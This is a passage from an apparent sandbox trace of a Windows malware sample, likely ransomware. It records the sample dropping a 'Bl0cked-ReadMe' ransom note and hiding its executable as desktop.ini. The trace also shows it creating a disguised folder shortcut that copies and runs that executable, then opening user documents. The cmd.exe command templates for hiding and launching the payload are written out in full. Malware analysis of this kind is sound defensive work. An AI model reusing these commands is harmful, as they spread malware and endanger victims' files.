lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0133.933] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\", cchCount1=46, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount2=41) returned 1 [0133.933] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", cchLength=0x2e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\") returned 0x2e [0133.933] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0133.933] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\", cchCount1=46, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0133.933] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0133.933] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0133.933] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0133.933] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\") returned 0x27 [0133.933] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0133.934] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0133.934] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xb90, dwThreadId=0xb9c)) returned 1 [0134.045] CloseHandle (hObject=0x110) returned 1 [0134.045] CloseHandle (hObject=0x114) returned 1 [0134.045] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfhtfadyqia-_\\bl0cked-readme.rtf")) returned 0xffffffff [0134.045] GetLastError () returned 0x2 [0134.045] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfhtfadyqia-_\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0134.150] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfhtfadyqia-_\\bl0cked-readme.rtf")) returned 0x20 [0134.151] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0134.151] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0134.151] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0134.151] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0134.151] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0134.151] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0134.151] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0134.151] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\") returned 0x27 [0134.152] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0134.152] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0134.152] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1") returned 0x26 [0134.152] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x156 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHT~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHT~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHT~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHT~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x156 [0134.152] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0134.152] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xc10, dwThreadId=0xafc)) returned 1 [0134.218] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0134.882] CloseHandle (hObject=0x114) returned 1 [0134.882] CloseHandle (hObject=0x110) returned 1 [0134.883] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0134.883] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0134.883] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0134.883] GetTickCount () returned 0x2abc8 [0134.883] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=19167215143) returned 1 [0134.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0134.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x32\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0134.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x63\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0134.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x46\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0134.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x50\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0134.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6b\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0134.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0134.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x37\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0134.883] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0134.883] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0134.883] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0134.883] CharUpperBuffW (in: lpsz="explorer.exe \"ftTfHtfADyQIa-_\" & type \"ftTfHtfADyQIa-_\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x6f | out: lpsz="EXPLORER.EXE \"FTTFHTFADYQIA-_\" & TYPE \"FTTFHTFADYQIA-_\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x6f [0134.883] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0134.883] CharUpperBuffW (in: lpsz="explorer.exe \"ftTfHtfADyQIa-_\" & type \"ftTfHtfADyQIa-_\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x70 | out: lpsz="EXPLORER.EXE \"FTTFHTFADYQIA-_\" & TYPE \"FTTFHTFADYQIA-_\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x70 [0134.883] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0134.883] CoInitialize (pvReserved=0x0) returned 0x0 [0134.884] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0134.885] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0134.885] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0134.886] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0134.888] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"ftTfHtfADyQIa-_\" & type \"ftTfHtfADyQIa-_\\desktop.ini\" > \"%TEMP%\\L2cFPkj7.exe\" && \"%TEMP%\\L2cFPkj7.exe\"") returned 0x0 [0134.888] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0134.888] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0134.888] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0134.888] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_.lnk", fRemember=0) returned 0x0 [0134.897] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0134.897] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0134.897] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0134.897] CoUninitialize () [0134.898] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.898] ReleaseMutex (hMutex=0xf8) returned 1 [0134.898] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.898] ReleaseMutex (hMutex=0xf8) returned 1 [0134.898] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.898] ReleaseMutex (hMutex=0xf8) returned 1 [0134.898] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.898] ReleaseMutex (hMutex=0xf8) returned 1 [0134.898] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\-V83XFbt5-FsW.docx" (normalized: "c:\\users\\eebsym5\\documents\\-v83xfbt5-fsw.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0134.898] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.898] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1c6b [0134.898] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.898] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19168752388) returned 1 [0134.898] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.898] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1c6b [0134.898] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1c6b [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x1c6b [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1c6b [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1c6b [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1c6b [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1c6b [0134.900] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.900] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.900] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1c6b [0134.900] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.900] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.900] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1c6b [0134.900] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.900] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1783 [0134.900] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0134.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0134.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0134.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x1c6b [0134.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0134.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0134.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0134.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x1c6b [0134.902] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, 